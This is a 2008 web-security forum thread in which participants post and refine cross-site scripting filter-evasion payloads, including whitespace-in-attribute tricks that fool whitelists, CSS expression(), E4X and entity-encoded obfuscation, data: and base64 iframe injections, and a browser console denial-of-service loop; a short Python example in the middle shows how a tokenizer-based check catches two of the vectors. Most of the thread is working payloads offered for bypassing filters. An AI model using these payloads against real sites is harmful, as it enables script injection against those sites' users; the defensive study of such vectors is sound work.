Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 02, 2008 08:26AM

I don't like to brag, but I'm a fucking genius :P

http://wocares.com/xsstester.php?yxss=1&xss=%3Ca+href%3D+harmless%3D%22+onmouseover%3Dalert(1)%2F%2F%22%3Etest%3C%2Fa%3E&order_0=0&maxlen=0&order_1=10&s11=&s12=&order_2=20&r11=&r12=&order_3=30&order_4=40&order_5=50&order_6=60&order_7=70&order_8=80&order_9=90&order_10=100&order_11=110&order_12=120&order_13=130&order_14=140&s21=&s22=&order_15=150&s31=&s32=&order_16=160&s41=&s42=&order_17=170&r21=&r22=&order_18=180&r31=&r32=&order_19=190&enviroment=%5Bcont%5D&headers=

<a href= harmless=" onmouseover=alert(1)//">test</a>

edit: a little explanation
IE and FF seem to ignore spaces in front and after the = for good reasons (formatting)
now the thing is that to filters, it looks like href is empty, even though href contains 'harmless="'
to the filter it now looks like the rest of the tag is
harmless=" onmouseover=alert(1)//"
when it really is
onmouseover=alert(1)//"

edit2:

and here's an autoexecuting version of the vector:
http://wocares.com/xsstester.php?yxss=1&xss=%3Cimg+src%3D+alt%3D%22+onerror%3Dalert(1)%2F%2F%22%3E&order_0=0&maxlen=0&order_1=10&s11=&s12=&order_2=20&r11=&r12=&order_3=30&order_4=40&order_5=50&order_6=60&order_7=70&order_8=80&order_9=90&order_10=100&order_11=110&order_12=120&order_13=130&order_14=140&s21=&s22=&order_15=150&s31=&s32=&order_16=160&s41=&s42=&order_17=170&r21=&r22=&order_18=180&r31=&r32=&order_19=190&enviroment=%5Bcont%5D&headers=


<img src= alt=" onerror=alert(1)//">



Edited 4 time(s). Last edit at 08/02/2008 08:37AM by Kyo.

Re: New XSS vectors/Unusual Javascript
Posted by: thrill
Date: August 02, 2008 10:28AM

Kyo Wrote:
-------------------------------------------------------
> I don't like to brag, but I'm a fucking genius :P

Don't forget modest too! ;)

Nice find too.. who would have thunkit that a little space could create such havoc!

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: August 02, 2008 01:32PM

Haha, pretty neat.

Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 03, 2008 09:53AM

thanks, guys

here's one that can be used against sites which only filter out comments between style tags:

<style x="></style>">
body {
width: expres/**/sion(alert('XSS'));
}
</style>



Edited 2 time(s). Last edit at 08/03/2008 09:54AM by Kyo.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 03, 2008 04:02PM

E4X a thousand ways to hack Javascript:-
location=<text>javascr{new Array}ipt:aler{new Array}t(1)</text>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 03, 2008 07:07PM

it doesn't work for me

Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: August 03, 2008 08:31PM

Does for me! Haha, that's insane Gareth! Awesome ^_^

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 04, 2008 04:33AM

@Kyo

FF only mate

@DoctorDan

Thanks :) I love hacking E4X :D


Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 05, 2008 12:20AM

I use FF...

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 05, 2008 02:37AM

@kyo

Try this:-
<script>location=<text>javascr{new Array}ipt:aler{new Array}t(1)</text></script>


Re: New XSS vectors/Unusual Javascript
Posted by: Matt Presson
Date: August 05, 2008 08:35AM

Are there any specific reasons why a lot of these only work in FF? Just curious, b/c a lot of these are great and I would love to be able to use them on assessments that I do internally for my employer.

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 05, 2008 08:52AM

@matt

To my knowledge FF is the only browser that implements E4X within Javascript. I could be wrong. In future they may work with other browsers.


Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 06, 2008 12:48PM

HOLY SHIT
<script>alert(»XSS«)</script>
Okay, I'm just fucking with you guys. Anyway, check out the javascript on this baby: http://itscoming.wut.bz
I used quite a lot of the crossbrowsercompatible shit posted in this thread, but it's still a work in progress :)

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: August 06, 2008 06:40PM

Apparently mother JS found a new youngling to raise ;)

Re: New XSS vectors/Unusual Javascript
Posted by: Matt Presson
Date: August 07, 2008 09:08AM

Wow. that is some really screwed up code.


Re: New XSS vectors/Unusual Javascript
Posted by: yawnmoth
Date: August 07, 2008 10:43AM

It seems to me like some of these vectors really ought to be mentioned in the XSS cheat sheet. Is that just not being maintained, anymore, or is there some other reason that these aren't being added to it?

Maybe someone else should take it on?

Kyo Wrote:
-------------------------------------------------------
> I don't like to brag, but I'm a fucking genius :P
>
> http://wocares.com/xsstester.php?yxss=1&xss=%3Ca+h
> ref%3D+harmless%3D%22+onmouseover%3Dalert(1)%2F%2F
> %22%3Etest%3C%2Fa%3E&order_0=0&maxlen=0&order_1=10
> &s11=&s12=&order_2=20&r11=&r12=&order_3=30&order_4
> =40&order_5=50&order_6=60&order_7=70&order_8=80&or
> der_9=90&order_10=100&order_11=110&order_12=120&or
> der_13=130&order_14=140&s21=&s22=&order_15=150&s31
> =&s32=&order_16=160&s41=&s42=&order_17=170&r21=&r2
> 2=&order_18=180&r31=&r32=&order_19=190&enviroment=
> %5Bcont%5D&headers=
>
> test
>
> edit: a little explanation
> IE and FF seem to ignore spaces in front and after
> the = for good reasons (formatting)
> now the thing is that to filters, it looks like
> href is empty, even though href contains
> 'harmless="'
> to the filter it now looks like the rest of the
> tag is
> harmless=" onmouseover=alert(1)//"
> when it really is
> onmouseover=alert(1)//"
>
> edit2:
>
> and here's an autoexecuting version of the
> vector:
> http://wocares.com/xsstester.php?yxss=1&xss=%3Cimg
> +src%3D+alt%3D%22+onerror%3Dalert(1)%2F%2F%22%3E&o
> rder_0=0&maxlen=0&order_1=10&s11=&s12=&order_2=20&
> r11=&r12=&order_3=30&order_4=40&order_5=50&order_6
> =60&order_7=70&order_8=80&order_9=90&order_10=100&
> order_11=110&order_12=120&order_13=130&order_14=14
> 0&s21=&s22=&order_15=150&s31=&s32=&order_16=160&s4
> 1=&s42=&order_17=170&r21=&r22=&order_18=180&r31=&r
> 32=&order_19=190&enviroment=%5Bcont%5D&headers=
>
>
>

Re: New XSS vectors/Unusual Javascript
Posted by: thornmaker
Date: August 07, 2008 01:09PM

yawnmoth Wrote:
-------------------------------------------------------
> It seems to me like some of these vectors really
> ought to be mentioned in the XSS cheat sheet. Is
> that just not being maintained, anymore, or is
> there some other reason that these aren't being
> added to it?
>

The XSS cheat sheet is more about how to get to the point where you can inject JavaScript (et al.) to a vulnerable page in the first place. This thread is more about what can be done with JavaScript after that point (in order to avoid detection and filters, that is... not how to bake up a cookie logger or whatever...)

Edit: That being said, there is obviously some overlap between these two



Edited 1 time(s). Last edit at 08/07/2008 01:11PM by thornmaker.

Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 07, 2008 03:13PM

well he was quoting my post, which means he's probably talking about the vector I came up with

I actually mailed that to RSnake requesting it to be added, no response so far. Oh well, I'll be patient.

edit:

oh yeah, I'd also be glad to make and maintain a cheat sheet, if RSnake wouldn't mind me taking all the content of his cheat sheet.

edit:

I sent him an email asking what he thinks



Edited 2 time(s). Last edit at 08/07/2008 03:24PM by Kyo.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 07, 2008 03:34PM

Is there any need for cheatsheets?

Isn't the fun finding them for yourself


Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 07, 2008 03:41PM

there is, if you're writing webapps

Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 08, 2008 02:36AM

two more vectors based on the one I posted on the top of this page:
1)
<img src= alt=" hello=">" onerror=alert(1)>

basically, making the whitelist believe the tag has ended when it's still going
the reality is:
<img
src= alt="
hello=">"
onerror=alert(1)
>

the whitelist thinks:
<img
src=
alt=" hello="
>

and 2), more making the whitelist believe the tag ended in an environment that allows harmless javascript, but filters out the good stuff

<script hello= harmless=" ok=">//" src="MALICIOUSJAVASCRIPT">
harmless javascript that is allowed
</script>

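The reason Kyo's "space after the =" vector and the "fake tag end" vector above slip past an attribute whitelist is that the filter tokenises differently from the browser. The added example below (not code from the thread) runs both of Kyo's <img> vectors through a naive regex whitelist and through Python's html.parser, which tokenises attributes the way a browser does: a value may begin after "= ", and a quoted value may contain ">". The allowed-attribute set is an assumption for the demo.

```python
import re
from html.parser import HTMLParser

# Assumed allowlist of attribute names a filter might permit on <img>.
ALLOWED_ATTRS = {"src", "alt", "title", "width", "height"}

# The naive filter the thread's vectors defeat: cut each tag at the first '>'
# and pull name=value pairs with a regex that allows no space after '='.
TAG_RE = re.compile(r"<(\w+)([^>]*)>")
NAIVE_ATTR_RE = re.compile(r'(\w+)=("[^"]*"|[^\s>]*)')


def naive_attr_names(html):
    """Attribute names the regex filter believes each tag carries."""
    return [[name.lower() for name, _ in NAIVE_ATTR_RE.findall(m.group(2))]
            for m in TAG_RE.finditer(html)]


def naive_filter_allows(html):
    return all(name in ALLOWED_ATTRS for tag in naive_attr_names(html) for name in tag)


class AttrCollector(HTMLParser):
    """Records every start tag with the attributes the tokenizer (and so the browser) sees."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, attrs))


def browser_attrs(html):
    parser = AttrCollector()
    parser.feed(html)
    parser.close()
    return parser.tags


def tokenizer_filter_allows(html):
    """Same allowlist, but applied to the tokenizer's view of the tag."""
    return all(name in ALLOWED_ATTRS
               for _, attrs in browser_attrs(html) for name, _ in attrs)


# Constructed test inputs: Kyo's two <img> vectors from this page.
VECTOR_SPACE = '<img src= alt=" onerror=alert(1)//">'
VECTOR_FAKE_END = '<img src= alt=" hello=">" onerror=alert(1)>'
```

The naive filter reports only src and alt for both vectors and lets them through; the tokenizer-based check sees onerror (and hello) and rejects them, which is why an attribute whitelist has to be applied to a real tokenizer's output rather than to a regex over the raw tag text.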
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 08, 2008 03:04AM

Not forgetting:-
<script/src=data:text/javascript,alert(1)></script>

and on IE:
<script/onreadystatechange=alert(1)>


Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 08, 2008 03:09AM

mhm, onreadystatechange, I haven't heard of that one before

nice!
Couldn't you also obfuscate the word javascript with encoding, though?


also, here I tried to wrap as much shit around the actual function as possible:
a:;{;1*(1/(this.window.top[(('')+("alert")+(''))])(/1/.source)+1)-1;};


edit:
yup, here's a more fun version of yours:
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>



Edited 1 time(s). Last edit at 08/08/2008 03:11AM by Kyo.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 08, 2008 09:51AM

location=XML(<x>java{[]}script:ale{[]}rt(/I am a e4x haxor/)</x>).*::*

Function(<text>\u0061{new String}lert(1)</text>)()




Edited 1 time(s). Last edit at 08/08/2008 09:59AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 11, 2008 09:03AM

new Function(<text><x y="a"></x><x y="lert"></x><x y="(1)"></x></text>..@y)()


Re: New XSS vectors/Unusual Javascript
Posted by: C1c4Tr1Z
Date: August 11, 2008 06:48PM

Here's one, it's very simple but I didn't read it in the thread:

<iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==>

Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 12, 2008 02:02PM

clever

Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: August 12, 2008 03:04PM

Gareth's are making me happy. Crazy concatenation in that last one. I've never thought of onreadystatechange outside the context of XHR requests, but after looking on the MSDN I see it does somewhat make sense. I haven't tested it out, but it seems as though onreadystatechange will also work on a few other interesting tags, as listed here (in the Applies To section): http://msdn.microsoft.com/en-us/library/ms534359.aspx

I bet that event is not commonly filtered as an attribute.

-Dan

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 13, 2008 10:25AM

eval(dispatchEvent[-5][4]+enableExternalCapture[-5][4]+dispatchEvent[-5][10]+enableExternalCapture[-5][10]+dispatchEvent[-5][5]+/(1)/[-1])

AND

eval(<x>{dispatchEvent[-5][4]}{enableExternalCapture[-5][4]}{dispatchEvent[-5][10]}{enableExternalCapture[-5][10]}{dispatchEvent[-5][5]}</x>..*+/(1)/[-1])




Edited 1 time(s). Last edit at 08/13/2008 11:46AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: August 14, 2008 06:19PM

Some Firebug fun (DoS)

for(_=console.dir;_==_;_(_))_(_)
